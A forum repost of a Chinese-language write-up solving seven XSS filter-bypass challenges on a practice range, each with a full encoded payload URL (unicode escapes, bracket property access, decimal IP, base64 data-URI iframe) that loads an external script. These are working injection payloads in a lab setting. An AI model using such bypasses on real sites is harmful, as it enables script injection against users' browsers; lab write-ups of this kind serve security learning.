• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

xss bypass 进阶


This Wind

Recommended Posts

在知识星球见到一位老哥的xss靶场,感觉不错做了后学到不少东西。由于懒惰,导致现在才写。
靶场一共有八题,只做了七题

 

靶场地址:http://xcao.vip
题目最终要求是加载:http://xcao.vip/xss/alert.js

第一题

独孤九剑-第一式
过滤了=(),输入点在标签里

thMJ6x.png

利用<闭合标签,使用document.write配合unicode编码写js到当前页面
payload:

http://xcao.vip/test/xss1.php?data=1%22%3E%3Cscript%3Edocument.write`\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0078\u0063\u0061\u006f\u002e\u0076\u0069\u0070\u002f\u0078\u0073\u0073\u002f\u0061\u006c\u0065\u0072\u0074\u002e\u006a\u0073\u0022\u003e\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e`%3C/script%3E%3C!--)

thMo3n.png

第二题

独孤九剑-第二式
过滤了=().输入点在标签里
thQuvt.png

利用<闭合标签,使用document.write配合top函数写js到当前页面
payload:

http://xcao.vip/test/xss2.php?data=1%22%3E%3Cscript%3Etop[%22document%22][%22write%22]`\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0078\u0063\u0061\u006f\u002e\u0076\u0069\u0070\u002f\u0078\u0073\u0073\u002f\u0061\u006c\u0065\u0072\u0074\u002e\u006a\u0073\u0022\u003e\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e`%3C/script%3E%20%3C!--

thQN2n.png

第三题

独孤九剑-第三式
过滤了().&#这意味着没发使用unicode编码了,但是开放了=
thQ5VO.png

将js放到某个公网ip上面,然后将ip转换成十进制即可
利用php的302跳转

<?php
header("Location: http://suo.im/5U1ERv");
?>

payload:

http://xcao.vip/test/xss3.php?data=1%22%3E%3Cscript%20src=%22http://2130706433%22%3E%3C/script%3E%3C!--

这里的2130706433是10进制编码后的127.0.0.1
thl8L6.png

第四题

独孤九剑-第四式
过滤了=().&#\
th190K.png

利用iframe标签然后配合base64编码的js加载

http://xcao.vip/test/xss4.php?data=1%22%3E%3Cscript%3Etop[%22document%22][%22write%22]`${top[%22String%22][%22fromCharCode%22]`61`%2b%22data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3hjYW8udmlwL3hzcy9hbGVydC5qcz48L3NjcmlwdD4=%3E111%3C/iframe%3E%22}%20%3Ciframe%20src`%3C/script%3E%3C!--

th1Z6I.png

后面的第五题和第六题都可以用这个payload就不另想了

第七题

独孤九剑-第七式
过滤了=().&#\%<>,输入点在js里

th3UxA.png

th3eC4.png

将=,<,>进行ascii编码,payload稍作修改即可

http://xcao.vip/test/xss7.php?data=%22%22;top[%22document%22][%22write%22]`${top[%22String%22][%22fromCharCode%22]`60`%2b%22iframe%20src%22%2btop[%22String%22][%22fromCharCode%22]`61`%2b%22data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3hjYW8udmlwL3hzcy9hbGVydC5qcz48L3NjcmlwdD4=%22%2btop[%22String%22][%22fromCharCode%22]`62`}`

th35ZV.png

题外话

第八题过滤的太变态暂时没思路
thG900.png

 

原文链接:https://422926799.github.io/posts/6bcf9b8f.html

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now